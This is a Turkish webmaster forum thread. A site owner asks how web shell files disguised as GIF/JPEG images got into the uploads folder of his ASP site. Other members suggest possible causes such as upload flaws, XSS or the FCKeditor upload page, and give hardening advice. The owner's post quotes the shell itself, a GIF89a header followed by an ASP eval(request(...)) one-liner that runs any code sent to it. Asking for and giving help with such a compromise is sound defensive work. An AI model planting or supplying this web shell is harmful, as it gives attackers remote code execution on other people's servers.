lostyazilim
tr.link

Site Shell Açığı ve Kapatma

11 Mesajlar 4.037 Okunma
acebozum
tr.link

altuncumedya altuncumedya WM Aracı Kullanıcı
  • Üyelik 30.01.2012
  • Yaş/Cinsiyet 39 / E
  • Meslek web tasarım
  • Konum Kahramanmaraş
  • Ad Soyad A** A**
  • Mesajlar 142
  • Beğeniler 1 / 11
  • Ticaret 0, (%0)
merhaba arkadaşlar. sitemin birisinin ana dizinine uploads klasörü adı altında gif veya jpeg gibi gösterilmiş shell olarak tabir edilen dosyalar sokulmuş. dosyaları txt ile açtığımda fonksiyonu olmayan basit bir kodlama yazılmış.

GIF89a
<%response.write("a1"&"b2"&"c3"&"d4")&eval(request("Fex0"))%>


bu işlemi nasıl yapıyorlar. sitemin admin paneli dışında upload işlemi yapılan bir yer yok. admin kısmındaki upload alanlarınada ulaşmaları çok zor.

bu açığın nedeni nedir ve nasıl kapatabilirim. Bu arada sitem windows sunucu üzerinde asp tabanlı bir site
 

 

elektronikssl
webimgo

KaanGiRGiN KaanGiRGiN Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 07.04.2015
  • Yaş/Cinsiyet 28 / E
  • Meslek IT Expert
  • Konum Balıkesir
  • Ad Soyad K** G**
  • Mesajlar 1057
  • Beğeniler 153 / 323
  • Ticaret 15, (%93)
upload açığı olabilir.
 

 

Dissident Dissident WM Aracı Kullanıcı
  • Üyelik 28.10.2016
  • Yaş/Cinsiyet 35 / E
  • Meslek Öğretmen
  • Konum Malatya
  • Ad Soyad E** Ç**
  • Mesajlar 64
  • Beğeniler 7 / 6
  • Ticaret 0, (%0)
hocam pm attım, dönüş yaparmısınız?
 

 

http://yemektariflerim.biz - http://bahistahtasi.com

altuncumedya altuncumedya WM Aracı Kullanıcı
  • Üyelik 30.01.2012
  • Yaş/Cinsiyet 39 / E
  • Meslek web tasarım
  • Konum Kahramanmaraş
  • Ad Soyad A** A**
  • Mesajlar 142
  • Beğeniler 1 / 11
  • Ticaret 0, (%0)
sitenin ziyaretçilere açık kısmında upload edilecek herhangi bir sayfa yada form yok
 

 

wmaraci
wmaraci

dump3cz dump3cz Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 01.05.2017
  • Yaş/Cinsiyet 25 / E
  • Meslek Yazılım
  • Konum Bilecik
  • Ad Soyad O** Ç**
  • Mesajlar 1749
  • Beğeniler 169 / 326
  • Ticaret 3, (%67)
XSS'ye dikkat ettin xss ile upload yaratıp upload yapılabiliyor.
 

 

altuncumedya altuncumedya WM Aracı Kullanıcı
  • Üyelik 30.01.2012
  • Yaş/Cinsiyet 39 / E
  • Meslek web tasarım
  • Konum Kahramanmaraş
  • Ad Soyad A** A**
  • Mesajlar 142
  • Beğeniler 1 / 11
  • Ticaret 0, (%0)
b açığı nasıl kapatırım. web.config dosyası ve ya başka bir fonksiyon ile. yani bunun nedeni sitedeki formlar mı nedir daha detaylı bilgi verebilecek bir arkadaş yokmu
 

 

NumanABi NumanABi --> numanozdemir.com <-- Kullanıcı
  • Üyelik 02.09.2016
  • Yaş/Cinsiyet 34 / E
  • Meslek -
  • Konum Kırıkkale
  • Ad Soyad N** Ö**
  • Mesajlar 1417
  • Beğeniler 380 / 442
  • Ticaret 21, (%95)
dump3cz XSS ile SSI Injection yapılamadığı sürece upload işlemi gerçekleştirilemez.
 

 

altuncumedya altuncumedya WM Aracı Kullanıcı
  • Üyelik 30.01.2012
  • Yaş/Cinsiyet 39 / E
  • Meslek web tasarım
  • Konum Kahramanmaraş
  • Ad Soyad A** A**
  • Mesajlar 142
  • Beğeniler 1 / 11
  • Ticaret 0, (%0)
Sql injection açıklarını kapattığımı düşünüyorum. Sitedeki tüm formlardan gelen verilerdeki zararlı karakterleri filtreleyip yasaklıyorum. Dizin görüntüleme kapalı. Sitede admin panel dışında upload yapılacak bir alan da yok. Velhasıl bir türlü çözemedim. Ama aklıma admin panelde kallanmak üzere fck editör kullanıyorum bir şekilde bu fck editör upload sayfasına erişmiş olabilir belki
 

 

utf8 utf8 WM Aracı Kullanıcı
  • Üyelik 05.05.2014
  • Yaş/Cinsiyet 49 / E
  • Meslek eğitim
  • Konum Konya
  • Ad Soyad B** Z**
  • Mesajlar 205
  • Beğeniler 25 / 21
  • Ticaret 0, (%0)
hocam aynı durumdan muzdaribim. Adamlar sızıyor programla açıkları tarıyorlar. Ben wordfence eklentisi kurdum. Panelde saldırıları firewall ile durdurmuş gibi gözüküyor fakat yinede sızıntı var. Çok acemilerin girmesi zorlaştı ama ustalar yine saldırıyor.
Tavsiyem weritabanı şifresini değiştirin. (config içinde de değişecek tabi)
wp kulanıcı şifresini özel ve uzun karakterler ile değiştirin.
Eklentilerden de saldırı olabiliyor. wp super cache şüpeli olarak görüyorum.
site içinde shell olabilir bu nedenle dosya tarihlerini kontrol edin yeni değişen dosya şüphelidir.
 

 

altuncumedya altuncumedya WM Aracı Kullanıcı
  • Üyelik 30.01.2012
  • Yaş/Cinsiyet 39 / E
  • Meslek web tasarım
  • Konum Kahramanmaraş
  • Ad Soyad A** A**
  • Mesajlar 142
  • Beğeniler 1 / 11
  • Ticaret 0, (%0)
Hocam ben wordpress hiç kullanmadım ihtiyacım olan yazılımları kendim yapıyorum asp ile. Hertürlü saldırıya karşıda tedbirimi alıyorum. Programlarlada açıkları tarıyorum sorun görünmüyor. Ama yinede biryerlerden sunucudaki diğer siteler olabilir açık buluyorlar.
 

 

Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al